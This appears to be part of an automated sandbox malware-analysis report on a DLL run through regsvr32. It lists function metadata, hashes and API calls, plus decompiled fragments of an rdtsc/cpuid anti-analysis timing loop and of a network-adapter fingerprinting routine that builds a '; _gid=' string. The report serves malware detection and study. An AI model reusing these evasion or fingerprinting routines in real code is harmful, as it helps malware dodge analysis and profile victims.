                                                                                                                                                                                                            • API String ID: 354099737-0
                                                                                                                                                                                                            • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                            • Instruction ID: 552499f61b09e7461f307abba5ef2f15989b63fd11695dc230060e4c3dbc2a50
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9C08C34900680C2F31F9762E9483E9623CA34C30AF020619C30305AE08F3C06C8C307
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2090905124.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090900152.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090931253.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090940305.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090957028.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                            • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                            • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0031260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00311E13), ref: 0031264B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                                                                            • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                            • Instruction ID: dd0f7ee722148995385f4e4f3d0433fd7bea81744e8bd8c4297899bc830ce2d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48E09272724641C2DF16EB20E8443D93374FB9C704F880122858E026A0EF2CC79DC700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00311000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                            • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                            • Instruction ID: 4671f7c9ed46b1f55aac6e59afa4177cf7ebc731342d12fe69fb3061579a6824
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CD0A972E1028083E7368B20EA163DA672AF3EC319F808206DA4A44964CF3CC398CA04
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2090905124.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090900152.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090931253.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090940305.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090957028.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %
                                                                                                                                                                                                            • API String ID: 0-2567322570
                                                                                                                                                                                                            • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                            • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2090905124.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090900152.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090931253.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090940305.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090957028.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                            • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00311E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                            			E00311E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                            0x00311e50
                                                                                                                                                                                                            0x00311e50
                                                                                                                                                                                                            0x00311e50
                                                                                                                                                                                                            0x00311e50
                                                                                                                                                                                                            0x00311e55
                                                                                                                                                                                                            0x00311e5a
                                                                                                                                                                                                            0x00311e5f
                                                                                                                                                                                                            0x00311e60
                                                                                                                                                                                                            0x00311e6b
                                                                                                                                                                                                            0x00311e6b
                                                                                                                                                                                                            0x00311e71
                                                                                                                                                                                                            0x00311e73
                                                                                                                                                                                                            0x00311e84
                                                                                                                                                                                                            0x00311e86
                                                                                                                                                                                                            0x00311e8a
                                                                                                                                                                                                            0x00311e8e
                                                                                                                                                                                                            0x00311e92
                                                                                                                                                                                                            0x00311e96
                                                                                                                                                                                                            0x00311e98
                                                                                                                                                                                                            0x00311e9f
                                                                                                                                                                                                            0x00311ea2
                                                                                                                                                                                                            0x00311ea5
                                                                                                                                                                                                            0x00311eab
                                                                                                                                                                                                            0x00311ead
                                                                                                                                                                                                            0x00311eb8
                                                                                                                                                                                                            0x00311eba
                                                                                                                                                                                                            0x00311ec1
                                                                                                                                                                                                            0x00311ec4
                                                                                                                                                                                                            0x00311ec7
                                                                                                                                                                                                            0x00311ec7
                                                                                                                                                                                                            0x00311ee9

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                            • Instruction ID: 124ab5e79cf760fd021e40c324bd9e5fc90414d19ecf6a23b981258723d2f92a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B101D472B24B908BDF248F36B600389B6A2F38D7C4F148535EB9C43B18DA3CD5958B04
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Analysis Process: regsvr32.exe PID: 3036 Parent PID: 2624 regsvr32.exeCOMMON

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 021427BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                                                            			E021427BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E02142990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x21470c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E02142990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                            0x021427bc
                                                                                                                                                                                                            0x021427bc
                                                                                                                                                                                                            0x021427bc
                                                                                                                                                                                                            0x021427bf
                                                                                                                                                                                                            0x021427c3
                                                                                                                                                                                                            0x021427c7
                                                                                                                                                                                                            0x021427cb
                                                                                                                                                                                                            0x021427d4
                                                                                                                                                                                                            0x021427d7
                                                                                                                                                                                                            0x021427e7
                                                                                                                                                                                                            0x021427ea
                                                                                                                                                                                                            0x021427fa
                                                                                                                                                                                                            0x02142800
                                                                                                                                                                                                            0x02142806
                                                                                                                                                                                                            0x0214285f
                                                                                                                                                                                                            0x0214285f
                                                                                                                                                                                                            0x02142876
                                                                                                                                                                                                            0x0214287b
                                                                                                                                                                                                            0x02142893
                                                                                                                                                                                                            0x02142893
                                                                                                                                                                                                            0x0214280f
                                                                                                                                                                                                            0x02142814
                                                                                                                                                                                                            0x0214281f
                                                                                                                                                                                                            0x0214282c
                                                                                                                                                                                                            0x0214282c
                                                                                                                                                                                                            0x0214282f
                                                                                                                                                                                                            0x02142835
                                                                                                                                                                                                            0x0214283b
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x02142842
                                                                                                                                                                                                            0x02142845
                                                                                                                                                                                                            0x02142849
                                                                                                                                                                                                            0x02142894
                                                                                                                                                                                                            0x02142897
                                                                                                                                                                                                            0x0214289e
                                                                                                                                                                                                            0x021428a9
                                                                                                                                                                                                            0x021428b5
                                                                                                                                                                                                            0x021428b7
                                                                                                                                                                                                            0x021428ba
                                                                                                                                                                                                            0x021428c1
                                                                                                                                                                                                            0x021428c8
                                                                                                                                                                                                            0x021428cd
                                                                                                                                                                                                            0x021428d0
                                                                                                                                                                                                            0x021428d0
                                                                                                                                                                                                            0x021428b5
                                                                                                                                                                                                            0x021428d7
                                                                                                                                                                                                            0x021428da
                                                                                                                                                                                                            0x021428df
                                                                                                                                                                                                            0x021428e8
                                                                                                                                                                                                            0x021428ed
                                                                                                                                                                                                            0x021428f6
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x021428fc
                                                                                                                                                                                                            0x0214284b
                                                                                                                                                                                                            0x02142854
                                                                                                                                                                                                            0x02142859
                                                                                                                                                                                                            0x02142859

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?,00000000,02142CFE,?,?,00000003,021424A4), ref: 0214280F
                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?,00000000,02142CFE,?,?,00000003,021424A4), ref: 02142845
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2095983808.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdaptersInfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3177971545-0
                                                                                                                                                                                                            • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                            • Instruction ID: ed2871b3d262ee6eb17fb4209a7a94e86f8aed58f02e446642a9866a24d7f327
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A31AB72701B8296EB25EB62E8087DD77A0FB59F94F484025DE0D07759EF78D18AC340
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02141810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2095983808.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                            • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                            • Instruction ID: 01f45671355ac9f6ca2467b03fb75b88eb78b5c9a1bfa126ea03356f42357285
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C71CD32310B919BEB24CF66E844BA937A1FB58BD8F04852ADE4E53B14DF38C195C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02141678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,00000000,02142CB1,?,?,00000003,021424A4), ref: 021416CB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2095983808.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InformationQuerySystem
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3562636166-0
                                                                                                                                                                                                            • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                            • Instruction ID: 9a0207428f3de82fd305f4c9d4a83b7cb87f7ef64f6e79971940c0b92c5f5496
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D218E75355B4093EB14EF92A8487A9A3A2BB99BC2F094038DE1E47714EF3CE4858700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8F91370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2097746182.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097737606.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097758241.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097776917.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097796705.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                            • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                            • API String ID: 4275171209-1517691801
                                                                                                                                                                                                            • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                            • Instruction ID: d58402523aa45de61867f6b8ded07bb346793c2564f4517cd5f4910259ccd42d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F451E1B251D6C48AE3A18B24E89479BBFA0F386358F145158E6CD4BBA9C37DC514CF44
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8F911B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2097746182.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097737606.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097758241.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097776917.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097796705.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                            • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                            • API String ID: 1174013218-1650116920
                                                                                                                                                                                                            • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                            • Instruction ID: 6608af3ea9cadc71cadd7eaf5fd0afc6bc6969bf4d43f0012be74416a8711f7a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D31F772908B858AE764CF25F84435AB6E2F789364F504039D68C97B78EB7CD158CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8F920A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2097746182.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097737606.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097758241.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097776917.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097796705.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 4275171209-2766056989
                                                                                                                                                                                                            • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                            • Instruction ID: d852fcecc8c65b33074624bcc973cb4eb89098c5c099dee049a95ff6459d2f31
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF326C76609BC48AD7B5CB56F49079AB7A5F7C9B90F10802AEACD93B18DB38C154CF01
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 021410AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2095983808.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcessSleepUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 354099737-0
                                                                                                                                                                                                            • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                            • Instruction ID: 43d1b066cd7020d6e89ae7bbe1166accac30d899b55b200d83702942db2dc3e9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78C01230100680E2F32DABA0A84C3A82225A320709F010619820E076A08F3830E8C202
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8F93100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2097746182.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097737606.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097758241.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097776917.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2097796705.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                            • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                            • Instruction ID: 3adc23c25f3a0f1b8435709f589f86897b1c8289c5bdacba1448a615a5bf1034
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19D13F76509BC486D774CB4AE49039AB7A1F3C9790F10902AEACD93B68DF78C094CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 021422DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
